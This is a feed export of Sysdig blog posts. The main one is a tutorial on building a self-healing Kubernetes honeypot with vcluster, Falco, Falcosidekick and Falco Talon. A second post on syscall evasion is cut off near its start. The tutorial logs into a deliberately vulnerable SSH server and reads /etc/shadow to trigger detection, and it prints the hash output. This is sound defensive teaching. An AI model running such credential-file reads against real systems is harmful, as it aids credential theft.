Sysdig | Jason Andress https://sysdig.com/blog/author/jason-andress/ Wed, 10 Apr 2024 16:44:14 +0000 en-US hourly 1 https://wordpress.org/?v=6.6.1 https://sysdig.com/wp-content/uploads/favicon-150x150.png Sysdig | Jason Andress https://sysdig.com/blog/author/jason-andress/ 32 32 Building Honeypots with vcluster and Falco: Episode II https://sysdig.com/blog/honeypots-vcluster-and-falco-episode-ii/ Wed, 10 Apr 2024 21:00:00 +0000 https://sysdig.com/?p=86701 This is part two in our series on building honeypots with Falco, vcluster, and other assorted open source tools. For...

The post Building Honeypots with vcluster and Falco: Episode II appeared first on Sysdig.

]]>
This is part two in our series on building honeypots with Falco, vcluster, and other assorted open source tools. For the previous installment, see Building honeypots with vcluster and Falco: Episode I.

When Last We Left our Heroes

In the previous article, we discussed high-interaction honeypots and used vcluster to build an intentionally-vulnerable SSH server inside of its own cluster so it couldn’t hurt anything else in the environment when it got owned. Then, we installed Falco on the host and proceeded to attack the SSH server, watching the Falco logs to see the appropriate rule trigger when we read /etc/shadow. 

This is all great, but it’s just a start. This time around, we’ll be adding additional functionality to our honeypot so we can react to what is happening inside it. Some of these additional pieces will also be laying down the infrastructure for adding additional functionality down the road. 

We’ll be going beyond the basics, and this is where things start to get fun.

Our Shortcomings

The setup from the previous article had two major shortcomings. There are a few more, but we’ll get to those later.

First, the previous iteration of our honeypot required being run directly on an OS sitting on an actual hunk of hardware. This is of limited utility as it really doesn’t scale well unless we want to set up an army of hardware to support our eventual sprawl of honeypot bits. At the time, this was the only way we could do this with Minikube and Falco, as the Falco of yore didn’t have the kernel modules we needed to do otherwise. Fortunately, this is no longer the case. We can now take a more cloud-native approach and build this on an EC2 instance in AWS, and everything will be satisfactory. To the cloud!

NOTE: We’re going to be building a honeypot which is, by definition, an intentionally vulnerable system. We won’t have much in the way of monitoring built out just yet, so we don’t suggest that you expose it to the internet.

Second, the old honeypot didn’t do much other than complain into the Falco logs when we went poking around in the pod’s sensitive files. This, we can also fix. We’re going to be using Falcosidekick and Falco Talon to make our honeypot actually do something when we go tripping Falco rules.

Response Engines

Response engine is a term often used in the context of EDR (Endpoint Detection and Response), SIEM (Security Information and Event Management), SOAR (Security Orchestration, Automation and Response), and XDR (Extended Detection and Response). See EDR vs. XDR vs. SIEM vs. MDR vs. SOAR for more information. 

It’s a component that executes an automated response to security threats. This is exactly the tool we need in this case. 

When we trip one of the Falco rules by interacting with our honeypot, we need to take automatic action. In our particular case, we’re going to be shutting down the pod that the attackers have owned so we can spin a clean one back up in its place. We’ll be using a tool called Falco Talon for this. We’re also going to include another tool, Falcosidekick, that will allow us some additional flexibility down the road to do other things in response to the events that happen in our environment. 

Falco Sidekick

Falco Sidekick

Falcosidekick is a great tool that enables us to connect Falco up to many other interesting bits and pieces. We can use it to perform monitoring and alerting, ship logs off to different tools, and all sorts of other things. This is the glue piece that we will use to send the events to Falco Talon. 

Falco Talon

Falco Talon is the piece that will be performing the actual responses to the Falco rules that get tripped. Talon has its own internal set of rules that defines which Falco rules it should respond to and what it should do when they are triggered. 

Getting Our Hands Dirty

Let’s jump right in and build some things. 

This time around, we’ll be building our honeypot on an Ubuntu Server 22.04 t3.xlarge EC2 instance on AWS. You may be able to go with a smaller instance, but there is a point at which the instance won’t have sufficient resources for everything to spin up. Very small instances, such as the t2.micro, will almost certainly not have sufficient horsepower for everything to function properly. 

In theory, you should be able to build this on any of the similar cloud services and have it work, as long as you have all the proper application bits in place. 

As a prerequisite, you will need to have installed the following tools, at the noted version or higher:

The rest we’ll install as we work through the process. 

Fire Up Minikube

1 – First we want to start up minikube using the docker driver. We’ll see it go through its paces and download a few dependencies.

21 – Next, we’ll enable the ingress addon for minikube. This will allow us to reach the SSH server that we’ll be installing shortly.

$ minikube start --vm-driver=docker

😄  minikube v1.32.0 on Ubuntu 22.04
✨  Using the docker driver based on user configuration
📌  Using Docker driver with root privileges
👍  Starting control plane node minikube in cluster minikube
🚜  Pulling base image ...
💾  Downloading Kubernetes v1.28.3 preload ...
    > preloaded-images-k8s-v18-v1...:  403.35 MiB / 403.35 MiB  100.00% 51.69 M
🔥  Creating docker container (CPUs=2, Memory=3900MB) ...
🐳  Preparing Kubernetes v1.28.3 on Docker 24.0.7 ...
    ▪ Generating certificates and keys ...
    ▪ Booting up control plane ...
    ▪ Configuring RBAC rules ...
🔗  Configuring bridge CNI (Container Networking Interface) ...
    ▪ Using image gcr.io/k8s-minikube/storage-provisioner:v5
🔎  Verifying Kubernetes components...
🌟  Enabled addons: storage-provisioner, default-storageclass
🏄  Done! kubectl is now configured to use "minikube" cluster and "default" namespace by default

$ minikube addons enable ingress

💡  ingress is an addon maintained by Kubernetes. For any concerns contact minikube on GitHub.
You can view the list of minikube maintainers at: https://github.com/kubernetes/minikube/blob/master/OWNERS
    ▪ Using image registry.k8s.io/ingress-nginx/kube-webhook-certgen:v20231011-8b53cabe0
    ▪ Using image registry.k8s.io/ingress-nginx/kube-webhook-certgen:v20231011-8b53cabe0
    ▪ Using image registry.k8s.io/ingress-nginx/controller:v1.9.4
🔎  Verifying ingress addon...
🌟  The 'ingress' addon is enabled


Install Falco

1 – Next, we need to add the falcosecurity helm repo so we can access the helm chart for Falco.

4 – Once we have the repo added, we’ll update to get the latest chart.

11 – We’ll use kubectl to create a namespace for Falco to live in. We’ll also use this same namespace later for Sidekick and Talon.

14 – Now, we’ll kick off the Falco install. You’ll notice here we have a few additional arguments to disable buffering for the Falco logs so we get events more quickly, install Sidekick during the Falco install, enable the web UI, and set up the outgoing webhook for Sidekick to point at the URL where Talon will shortly be listening.

$ helm repo add falcosecurity https://falcosecurity.github.io/charts
"falcosecurity" has been added to your repositories

$ helm repo update
Hang tight while we grab the latest from your chart repositories...
...Successfully got an update from the "falcosecurity" chart repository
...Successfully got an update from the "securecodebox" chart repository
...Successfully got an update from the "stable" chart repository
Update Complete. ⎈Happy Helming!⎈

$ kubectl create namespace falco
namespace/falco created

$ helm install falco falcosecurity/falco --namespace falco \
--set tty=true \
--set falcosidekick.enabled=true \
--set falcosidekick.webui.enabled=true \
--set falcosidekick.config.webhook.address="http://falco-talon:2803"
NAME: falco
LAST DEPLOYED: Wed Dec  0 19:38:38 2023
NAMESPACE: falco
STATUS: deployed
REVISION: 1
NOTES:
Falco agents are spinning up on each node in your cluster. After a few
seconds, they are going to start monitoring your containers looking for
security issues.


No further action should be required.


💡Note: If you want to dig deeper into Falco, take a look at the course Falco 101.

Update the Falco Rules

Later on, we’ll be setting up a port forward for the SSH server so we can reach it. Falco is going to be vocal about this and it will trigger the “Redirect STDOUT/STDIN to Network Connection in Container” rule a LOT, which will make it difficult to see the rule we actually care about in the Falco logs, as well as send quite a lot of extra events to Talon. Let’s just disable that rule.

If you want to take a look at the rule we’re disabling, you can find it in the Falco rules repo here.

1 – We’re going to make a temporary file to hold our rule modification, into which we will insert a customRules section.

2 – Next, we’ll add the override.yaml.

3 – Then, the existing rule from the Falco rules file that we’re going to override.

4 – And, tell Falco that we want to disable it.

6 – Then, we’ll use helm to upgrade Falco and feed it the file we made, telling it to reuse the rest of the values it previously had.

21 – Lastly, we’ll kill off the existing Falco pods so we get new ones with the rule disabled in their rulesets.

echo "customRules:" > /tmp/customrules.yaml
echo "  override.yaml: |-" >> /tmp/customrules.yaml
echo "    - rule: Redirect STDOUT/STDIN to Network Connection in Container" >> /tmp/customrules.yaml
echo "      enabled: false" >> /tmp/customrules.yaml

$ helm upgrade falco falcosecurity/falco --namespace falco --values /tmp/customrules.yaml --reuse-values
Release "falco" has been upgraded. Happy Helming!
NAME: falco
LAST DEPLOYED: Wed Dec  0 23:56:23 2023
NAMESPACE: falco
STATUS: deployed
REVISION: 2
NOTES:
Falco agents are spinning up on each node in your cluster. After a few
seconds, they are going to start monitoring your containers looking for
security issues.


No further action should be required.

$ kubectl delete pods -n falco -l app.kubernetes.io/name=falco
pod "falco-94wsk" deleted


Install Falco Talon

Now let’s install Falco Talon.

1 – As it’s currently an alpha, Talon isn’t published in the standard helm repos. We’ll clone the Talon repo from GitHub to get a copy of the helm chart. 

12 – If we take a quick look at the Talon repo, we can see the helm chart for it, as well as a couple yaml files that hold its configuration. We’ll be changing the rules.yaml in the next set of steps.

16 – Now, a quick helm install of Talon into the falco namespace alongside Falco and Sidekick.

git clone https://github.com/Issif/falco-talon.git /tmp/falco-talon

Cloning into '/tmp/falco-talon'...
remote: Enumerating objects: 1599, done.
remote: Counting objects: 100% (744/744), done.
remote: Compressing objects: 100% (349/349), done.
remote: Total 1599 (delta 473), reused 565 (delta 338), pack-reused 855
Receiving objects: 100% (1599/1599), 743.58 KiB | 2.81 MiB/s, done.
Resolving deltas: 100% (866/866), done.

 
ls /tmp/falco-talon/deployment/helm/
Chart.yaml  rules.yaml  templates  values.yaml


$ helm install falco-talon /tmp/falco-talon/deployment/helm --namespace falco

NAME: falco-talon
LAST DEPLOYED: Thu Dec  0 00:01:53 2023
NAMESPACE: falco
STATUS: deployed
REVISION: 1
TEST SUITE: None

Update the Talon Rules and Configuration

As we discussed earlier, we need to set up the rules for Talon separately. Let’s take a quick peek at what we have in the rules.yaml now.

1 – Each rule in the file is designated with ‘- name’ and we have a few examples to look at.

21 – This is a rule along the lines of what we want to replicate, though we can drop the parameters section.

$ cat /tmp/falco-talon/deployment/helm/rules.yaml 

- name: Rule Labelize                                                                                                                                                                     
  match:                                                                                                                                                                                  
    rules:                                                                                                                                                                                
      - Terminal shell in container                                                                                                                                                       
    output_fields:                                                                                                                                                                        
      - k8s.ns.name!=kube-system                                                                                                                                                          
  action:                                                                                                                                                                                 
    name: kubernetes:labelize                                                                                                                                                             
    parameters:                                                                                                                                                                           
      labels:                                                                                                                                                                             
        suspicious: "true"                                                                                                                                                                
- name: Rule NetworkPolicy                                                                                                                                                                
  match:                                                                                                                                                                                  
    rules:                                                                                                                                                                                
      - "Outbound Connection to C2 Servers"                                                                                                                                               
  action:                                                                                                                                                                                 
    name: kubernetes:networkpolicy                                                                                                                                                        
  before: true                                                                                                                                                                            
- name: Rule Terminate                                                                                                                                                                    
  match:                                                                                                                                                                                  
    rules:                                                                                                                                                                                
      - "Outbound Connection to C2 Servers"                                                                                                                                               
  action:                                                                                                                                                                                 
    name: kubernetes:terminate                                                                                                                                                            
    parameters:                                                                                                                                                                           
      ignoreDaemonsets: true                                                                                                                                                              
      ignoreStatefulsets: true


This will work very similarly to how we edited the Falco rules earlier.

1 – We’ll echo a series of lines into the /tmp/falco-talon/deployment/helm/rules.yaml file. We need to name the Talon rule (this is an arbitrary name), tell it which Falco rule we want to match against (this is the specific name of the Falco rule), and then tell it what action we want it to take on a match. In this case, we’ll be terminating the pod.

15 – We need to comment out one of the outputs in the values.yaml in the Talon chart directory while we’re in here, since we won’t be configuring a Slack alert. If we didn’t do this, it wouldn’t hurt anything, but we would see an error later in the Talon logs.

17 – Once again, we’ll do a helm upgrade and point at our updated files. Note that we aren’t  using the –reuse-values argument to tell helm to keep the rest of the existing settings this time. If we did this, our changes to the values.yaml would not be included.

27 – Then, we need to kill the existing pods to refresh them.

$ echo -e '                                                                                                                                                           ' >> /tmp/falco-talon/deployment/helm/rules.yaml

$ echo -e '- name: Sensitive file opened                                                                                                                                                             ' >> /tmp/falco-talon/deployment/helm/rules.yaml

$ echo -e '  match:                                                                                                                                                                                  ' >> /tmp/falco-talon/deployment/helm/rules.yaml

$ echo -e '    rules:                                                                                                                                                                                ' >> /tmp/falco-talon/deployment/helm/rules.yaml

$ echo -e '      - "Read sensitive file untrusted"                                                                                                                                                   ' >> /tmp/falco-talon/deployment/helm/rules.yaml

$ echo -e '  action:                                                                                                                                                                                 ' >> /tmp/falco-talon/deployment/helm/rules.yaml

$ echo -e '    name: kubernetes:terminate ' >> /tmp/falco-talon/deployment/helm/rules.yaml

sed -i 's/^\s*-\s*slack/ # - slack/' /tmp/falco-talon/deployment/helm/values.yaml

$ helm upgrade falco-talon /tmp/falco-talon/deployment/helm --namespace falco

Release "falco-talon" has been upgraded. Happy Helming!
NAME: falco-talon
LAST DEPLOYED: Thu Dec  0 00:10:28 2023
NAMESPACE: falco
STATUS: deployed
REVISION: 2
TEST SUITE: None

$ kubectl delete pods -n falco -l app.kubernetes.io/name=falco-talon

pod "falco-talon-5bcf97655d-gvkv9" deleted
pod "falco-talon-5bcf97655d-wxr4g" deleted


Install vcluster

So that we can run our SSH server in isolation, we’ll download vcluster and set it up.

1 – Here, we’ll set an environment variable to fish out the latest vcluster version from the GitHub repository.

3 – Now, we’ll use that environment variable to construct the download URL.

5 – We’ll use curl to download the file and move it to /usr/local/bin.

11 – Now, let’s check the vcluster version to make sure we got everything installed properly. 

14 – We’ll finish up by creating a vcluster namespace for everything to live in.

$ LATEST_TAG=$(curl -s -L -o /dev/null -w %{url_effective} "https://github.com/loft-sh/vcluster/releases/latest" | rev | cut -d'/' -f1 | rev)

$ URL="https://github.com/loft-sh/vcluster/releases/download/${LATEST_TAG}/vcluster-linux-amd64"

$ curl -L -o vcluster "$URL" && chmod +x vcluster && sudo mv vcluster /usr/local/bin;
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
100 61.4M  100 61.4M    0     0  80.7M      0 --:--:-- --:--:-- --:--:--  194M

$ vcluster version
vcluster version 0.18.0

$ kubectl create namespace vcluster
namespace/vcluster created


Install the SSH Server in vcluster

Now that we have vcluster working, we can get our target SSH server installed.

1 – We’ll start off by creating a virtual cluster named SSH in the vcluster namespace. It’s also important to note that we have now switched contexts to the SSH cluster. 

14 – Now, we’ll create a namespace called SSH inside our virtual cluster.

17 – We’ll add the securecodebox repo so we can get the chart for the SSH server.

20 – And, do a quick update to pull the latest chart.

27 – Here, we’ll use helm to install the intentionally vulnerable SSH server.

42 – Last, we’ll disconnect from the vcluster, which will switch our context back to minikube.

$ vcluster create ssh -n vcluster

05:36:45 info Detected local kubernetes cluster minikube. Will deploy vcluster with a NodePort & sync real nodes
05:36:45 info Create vcluster ssh...
05:36:45 info execute command: helm upgrade ssh /tmp/vcluster-0.18.0.tgz-1681152849 --kubeconfig /tmp/2282824298 --namespace vcluster --install --repository-config='' --values /tmp/654191707
05:36:46 done Successfully created virtual cluster ssh in namespace vcluster
05:36:46 info Waiting for vcluster to come up...
05:37:11 info Stopping docker proxy...
05:37:21 info Starting proxy container...
05:37:21 done Switched active kube context to vcluster_ssh_vcluster_minikube
- Use `vcluster disconnect` to return to your previous kube context
- Use `kubectl get namespaces` to access the vcluster

$ kubectl create namespace ssh
namespace/ssh created

$ helm repo add securecodebox https://charts.securecodebox.io/
"securecodebox" already exists with the same configuration, skipping

$ helm repo update
Hang tight while we grab the latest from your chart repositories...
...Successfully got an update from the "falcosecurity" chart repository
...Successfully got an update from the "securecodebox" chart repository
...Successfully got an update from the "stable" chart repository
Update Complete. ⎈Happy Helming!⎈

$ helm install my-dummy-ssh securecodebox/dummy-ssh --version 3.4.0 --namespace ssh \
--set global.service.type="nodePort"

NAME: my-dummy-ssh
LAST DEPLOYED: Fri Dec  0 05:38:10 2023
NAMESPACE: ssh
STATUS: deployed
REVISION: 1
TEST SUITE: None
NOTES:
Demo SSH Server deployed.

Note this should used for demo and test purposes.
Do not expose this to the Internet!

$ vcluster disconnect

05:38:19 info Successfully disconnected from vcluster: ssh and switched back to the original context: minikube


Test Everything Out

Okay! Now we have everything built. Let’s give it a test.

You may recall the vcluster reference diagram from the previous article:

This will be helpful to keep in mind when visualizing the architecture as we work through this.

1 – Let’s take a quick look at the pods in the vcluster namespace. We can see our SSH server here called my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh. We’ll note that for future reference. 

10 – Here, we’ll set up a port forward to expose the SSH server.

18 – Now, we’ll kick off the rest of the events by using sshpass to SSH into the server and read the /etc/shadow file. Right now we’re doing this manually, so we don’t strictly need sshpass, but we’re going to be automating this later and we’ll need it then.

22 – Here, we can see the contents of the file.

$ kubectl get pods -n vcluster

NAME                                           READY   STATUS    RESTARTS   AGE
coredns-68bdd584b4-dwmms-x-kube-system-x-ssh   1/1     Running   0          4m43s
my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh      1/1     Running   0          3m42s
ssh-0                                          1/1     Running   0          5m7s

$ sleep 30

$ kubectl port-forward svc/"$SSH_SERVICE" 5555:22 -n vcluster & 

[1] 1196783
$ Forwarding from 127.0.0.1:5555 -> 22
Forwarding from [::1]:5555 -> 22

$ sleep 10

$ sshpass -p "THEPASSWORDYOUCREATED" ssh -o StrictHostKeyChecking=no -p 5555 
root@127.0.0.1 "cat /etc/shadow"

Handling connection for 5555
root:$6$hJ/W8Ww6$pLqyBWSsxaZcksn12xZqA1Iqjz.15XryeIEZIEsa0lbiOR9/3G.qtXl/SvfFFCTPkElo7VUD7TihuOyVxEt5j/:18281:0:99999:7:::
daemon:*:18275:0:99999:7:::
bin:*:18275:0:99999:7:::
sys:*:18275:0:99999:7:::
sync:*:18275:0:99999:7:::
games:*:18275:0:99999:7:::
man:*:18275:0:99999:7:::
lp:*:18275:0:99999:7:::
mail:*:18275:0:99999:7:::
news:*:18275:0:99999:7:::
uucp:*:18275:0:99999:7:::
proxy:*:18275:0:99999:7:::
www-data:*:18275:0:99999:7:::
backup:*:18275:0:99999:7:::
list:*:18275:0:99999:7:::
irc:*:18275:0:99999:7:::
gnats:*:18275:0:99999:7:::
nobody:*:18275:0:99999:7:::
systemd-timesync:*:18275:0:99999:7:::
systemd-network:*:18275:0:99999:7:::
systemd-resolve:*:18275:0:99999:7:::
systemd-bus-proxy:*:18275:0:99999:7:::
_apt:*:18275:0:99999:7:::
sshd:*:18281:0:99999:7:::

Checking the Logs

Let’s see what all happened as a result of our attack against the SSH server.

1 – We’ll set an environment variable up to find the Falco pod for us and hold its location.

3 – Now, let’s have a look at those logs. The bits at the beginning are from Falco spinning up. Incidentally, we can see the override file that we created earlier loading here.

18 – This is the meaty bit. In the output, we can see “Warning Sensitive file opened for reading by non-trusted program (file=/etc/shadow),” which is exactly what we did when we poked at the SSH server.

22 – Now, let’s look at the Talon logs. Here, we’ll put a one-liner together that will find the Talon pods and fetch the logs for us. Note that there are two Talon pods and what we want could be in either of them, so we’ll grab the logs from both. You can see that the output is interleaved from both of them.

30 – Here, we can see the Falco event coming through to Talon. 

32 – And here we got a match against the Talon rule we created earlier. 

33 – Here is the action from the Talon rule being executed.

$ FALCO_POD=$(kubectl get pods -n falco -l app.kubernetes.io/name=falco -o=jsonpath='{.items[*].metadata.name}')

$ kubectl logs "$FALCO_POD" -n falco

Defaulted container "falco" out of: falco, falcoctl-artifact-follow, falco-driver-loader (init), falcoctl-artifact-install (init)
Fri Dec  0 05:33:49 2023: Falco version: 0.36.2 (x86_64)
Fri Dec  0 05:33:49 2023: Falco initialized with configuration file: /etc/falco/falco.yaml
Fri Dec  0 05:33:49 2023: Loading rules from file /etc/falco/falco_rules.yaml
Fri Dec  0 05:33:49 2023: Loading rules from file /etc/falco/rules.d/override.yaml
Fri Dec  0 05:33:49 2023: The chosen syscall buffer dimension is: 8388608 bytes (8 MBs)
Fri Dec  0 05:33:49 2023: Starting health webserver with threadiness 4, listening on port 8765
Fri Dec  0 05:33:49 2023: Loaded event sources: syscall
Fri Dec  0 05:33:49 2023: Enabled event sources: syscall
Fri Dec  0 05:33:49 2023: Opening 'syscall' source with Kernel module

<snip>

{"hostname":"falco-wchsq","output":"18:39:24.133546875: Warning Sensitive file opened for reading by non-trusted program (file=/etc/shadow gparent=sshd ggparent=containerd-shim gggparent=<NA> evt_type=open user=root user_uid=0 user_loginuid=0 process=cat proc_exepath=/bin/cat parent=sshd command=cat /etc/shadow terminal=0 exe_flags=O_RDONLY container_id=0f044393375b container_image=securecodebox/dummy-ssh container_image_tag=v1.0.0 container_name=k8s_dummy-ssh_my-dummy-ssh-7955bc99c8-mxshb-x-ssh-x-ssh_vcluster_e10eeedf-7ad2-4a7e-8b73-b7713d6537da_0 k8s_ns=vcluster k8s_pod_name=my-dummy-ssh-7955bc99c8-mxshb-x-ssh-x-ssh)","priority":"Warning","rule":"Read sensitive file untrusted","source":"syscall","tags":["T1555","container","filesystem","host","maturity_stable","mitre_credential_access"],"time":"2023-12-08T18:39:24.133546875Z", "output_fields": {"container.id":"0f044393375b","container.image.repository":"securecodebox/dummy-ssh","container.image.tag":"v1.0.0","container.name":"k8s_dummy-ssh_my-dummy-ssh-7955bc99c8-mxshb-x-ssh-x-ssh_vcluster_e10eeedf-7ad2-4a7e-8b73-b7713d6537da_0","evt.arg.flags":"O_RDONLY","evt.time":43012267506,"evt.type":"open","fd.name":"/etc/shadow","k8s.ns.name":"vcluster","k8s.pod.name":"my-dummy-ssh-7955bc99c8-mxshb-x-ssh-x-ssh","proc.aname[2]":"sshd","proc.aname[3]":"containerd-shim","proc.aname[4]":null,"proc.cmdline":"cat /etc/shadow","proc.exepath":"/bin/cat","proc.name":"cat","proc.pname":"sshd","proc.tty":0,"user.loginuid":0,"user.name":"root","user.uid":0}}

<snip>

$ kubectl get pods -n falco -l app.kubernetes.io/name=falco-talon -o=jsonpath='{range .items[*]}{.metadata.name}{"\n"}{end}' | xargs -I {} kubectl logs {} -n falco

2023-12-00T05:33:41Z INF init action_category=kubernetes
2023-12-00T05:33:41Z INF init notifier=k8sevents
2023-12-00T05:33:41Z INF init notifier=slack
2023-12-00T05:33:41Z INF init result="4 rules have been successfully loaded"
2023-12-00T05:33:41Z INF init result="watch of rules enabled"
2023-12-00T05:33:41Z INF init result="Falco Talon is up and listening on 0.0.0.0:2803"
2023-12-00T05:44:46Z INF event output="05:44:46.118305822: Warning Sensitive file opened for reading by non-trusted program (file=/etc/shadow gparent=sshd ggparent=containerd-shim gggparent=<NA> evt_type=open user=root user_uid=0 user_loginuid=0 process=cat proc_exepath=/bin/cat parent=sshd command=cat /etc/shadow terminal=0 exe_flags=O_RDONLY container_id=1536aa9c45c2 container_image=securecodebox/dummy-ssh container_image_tag=v1.0.0 container_name=k8s_dummy-ssh_my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh_vcluster_21bdc319-5566-41ee-8a64-d8b7628e5937_0 k8s_ns=vcluster k8s_pod_name=my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh)" priority=Warning rule="Read sensitive file untrusted" source=syscall 
trace_id=79db4b47-0112-4a22-8068-e171702e018a
2023-12-00T05:44:46Z INF match action=kubernetes:terminate rule="Sensitive file opened" trace_id=79db4b47-0112-4a22-8068-e171702e018a
2023-12-00T05:44:46Z INF action Namespace=vcluster Pod=my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh action=kubernetes:terminate event="05:44:46.118305822: Warning Sensitive file opened for reading by non-trusted program (file=/etc/shadow gparent=sshd ggparent=containerd-shim gggparent=<NA> evt_type=open user=root user_uid=0 user_loginuid=0 process=cat proc_exepath=/bin/cat parent=sshd command=cat /etc/shadow terminal=0 exe_flags=O_RDONLY container_id=1536aa9c45c2 container_image=securecodebox/dummy-ssh container_image_tag=v1.0.0 container_name=k8s_dummy-ssh_my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh_vcluster_21bdc319-5566-41ee-8a64-d8b7628e5937_0 k8s_ns=vcluster k8s_pod_name=my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh)" rule="Sensitive file opened" status=success trace_id=79db4b47-0112-4a22-8068-e171702e018a
2023-12-00T05:44:46Z INF notification action=kubernetes:terminate notifier=k8sevents rule="Sensitive file opened" status=success trace_id=79db4b47-0112-4a22-8068-e171702e018a
2023-12-00T05:33:41Z INF init action_category=kubernetes
2023-12-00T05:33:41Z INF init notifier=k8sevents
2023-12-00T05:33:41Z INF init notifier=slack
2023-12-00T05:33:41Z INF init result="4 rules have been successfully loaded"
2023-12-00T05:33:41Z INF init result="watch of rules enabled"
2023-12-00T05:33:41Z INF init result="Falco Talon is up and listening on 0.0.0.0:2803

Now, let’s go take a peek at the cluster and see what happened as a result of our efforts. As we noted earlier, the name of the SSH server pod was my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh.

1 – Let’s get the pods again from the vcluster namespace. Now, we can see the name of the SSH server pod is my-dummy-ssh-7955bc99c8-k8jgl-x-ssh-x-ssh. Success!

8 – We’ll take a look at the events in the vcluster namespace and grep for my-dummy-ssh to find the bits we care about.

14 – Here, we can see the new SSH server pod my-dummy-ssh-7955bc99c8-k8jgl-x-ssh-x-ssh being started up.

20 – We can see the owned pod my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh being killed off. 

$ kubectl get pods -n vcluster

NAME                                           READY   STATUS    RESTARTS   AGE
coredns-68bdd584b4-dwmms-x-kube-system-x-ssh   1/1     Running   0          9m11s
my-dummy-ssh-7955bc99c8-k8jgl-x-ssh-x-ssh      1/1     Running   0          95s
ssh-0                                          1/1     Running   0          9m35s

$ kubectl get events -n vcluster | grep my-dummy-ssh

113s        Normal    falco-talon:kubernetes:terminate:success   pod/my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh      Status: success...
113s        Normal    Scheduled                                  pod/my-dummy-ssh-7955bc99c8-k8jgl-x-ssh-x-ssh      Successfully assigned vcluster/my-dummy-ssh-7955bc99c8-k8jgl-x-ssh-x-ssh to minikube
112s        Normal    Pulled                                     pod/my-dummy-ssh-7955bc99c8-k8jgl-x-ssh-x-ssh      Container image "docker.io/securecodebox/dummy-ssh:v1.0.0" already present on machine
112s        Normal    Created                                    pod/my-dummy-ssh-7955bc99c8-k8jgl-x-ssh-x-ssh      Created container dummy-ssh
112s        Normal    Started                                    pod/my-dummy-ssh-7955bc99c8-k8jgl-x-ssh-x-ssh      Started container dummy-ssh
8m28s       Normal    Scheduled                                  pod/my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh      Successfully assigned vcluster/my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh to minikube
8m27s       Normal    Pulling                                    pod/my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh      Pulling image "docker.io/securecodebox/dummy-ssh:v1.0.0"
8m18s       Normal    Pulled                                     pod/my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh      Successfully pulled image "docker.io/securecodebox/dummy-ssh:v1.0.0" in 9.611s (9.611s including waiting)
8m17s       Normal    Created                                    pod/my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh      Created container dummy-ssh
8m16s       Normal    Started                                    pod/my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh      Started container dummy-ssh
113s        Normal    Killing                                    pod/my-dummy-ssh-7955bc99c8-mwqxg-x-ssh-x-ssh      Stopping container dummy-ssh

And there we have it, end to end. Here’s what we did:

  • Attacked the SSH server pod
  • Tripped the ‘Sensitive file opened for reading by non-trusted program’ rule in Falco
  • Used a webhook from Falcosidekick to Falco Talon to ship the events over
  • Tripped the ‘Sensitive file opened’ rule in Falco Talon
  • Terminated the offending pod

And Now With Slightly More Automation

All of that above was quite a few moving parts. Wouldn’t it be nice if we could just run a script to do all of this? Yes, yes it would. Fortunately, we can do just that.

In the Sysdig TRT GitHub repo, pull down the minhoney.sh file. You’ll want to set it executable. To fire up the honeypot, simply run the script with the --buildit argument:

$ ./minhoney.sh --buildit

To take everything back down again, run the script again with the --burnit argument.

$ ./minhoney.sh --burnit
NOTE: When run with –burnit, the script will attempt to do some cleanup of things that may cause problems with future runs. It will uninstall anything in helm, kill off everything in minikube, and delete everything out of /tmp that the current user has permissions to delete. It is NOT recommended that you run this on anything other than a system or instance built for this specific purpose. Don’t say we didn’t warn you, cause we totally warned you.  

That’s All (for Now) Folks

If we take a step back to see everything we have explained, there we have it, end to end:

  • Attack the SSH server pod
  • Activate the rule ‘Sensitive file open for reading by untrusted program’ in Falco
  • Used a webhook from Falcosidekick to Falco Talon to send the events
  • Enabled the ‘Sensitive file open’ rule in Falco Talon
  • Terminated the offending pod

In the next part of this series, we’ll add several additional pieces to this. Logging and alerting would be nice, as well as additional automation to set everything up. We’ll also scale this up with some additional targets to attack.

For the previous episode with the basics, see Building honeypots with vcluster and Falco: Episode I.

The post Building Honeypots with vcluster and Falco: Episode II appeared first on Sysdig.

]]>
Exploring Syscall Evasion – Linux Shell Built-ins https://sysdig.com/blog/exploring-syscall-evasion/ Wed, 14 Feb 2024 15:15:00 +0000 https://sysdig.com/?p=84306 This is the first article in a series focusing on syscall evasion as a means to work around detection by...

The post Exploring Syscall Evasion – Linux Shell Built-ins appeared first on Sysdig.

]]>
This is the first article in a series focusing on syscall evasion as a means to work around detection by security tools and what we can do to combat such efforts. We’ll be starting out the series discussing how this applies to Linux operating systems, but this is a technique that applies to Windows as well, and we’ll touch on some of this later on in the series. 

In this particular installment, we’ll be discussing syscall evasion with bash shell builtins. If you read that and thought “what evasion with bash what now?”, that’s ok. We’ll walk through it from the beginning. 

What is a Syscall?

System calls, commonly referred to as syscalls, are the interface between user-space applications and the kernel, which, in turn, talks to the rest of our resources, including files, networks, and hardware. Basically, we can consider syscalls to be the gatekeepers of the kernel when we’re looking at things from a security perspective.

Many security tools (Falco included) that watch for malicious activity taking place are monitoring syscalls going by. This seems like a reasonable approach, right? If syscalls are the gatekeepers of the kernel and we watch the syscalls with our security tool, we should be able to see all of the activity taking place on the system. We’ll just watch for the bad guys doing bad things with bad syscalls and then we’ll catch them, right? Sadly, no.

There is a dizzying array of syscalls, some of which have overlapping sets of functionality. For instance, if we want to open a file, there is a syscall called open() and we can look at the documentation for it here. So if we have a security tool that can watch syscalls going by, we can just watch for the open() syscall and we should be all good for monitoring applications trying to open files, right? Well, sort of.

If we look at the synopsis in the open() documentation:

Syscall Evasion

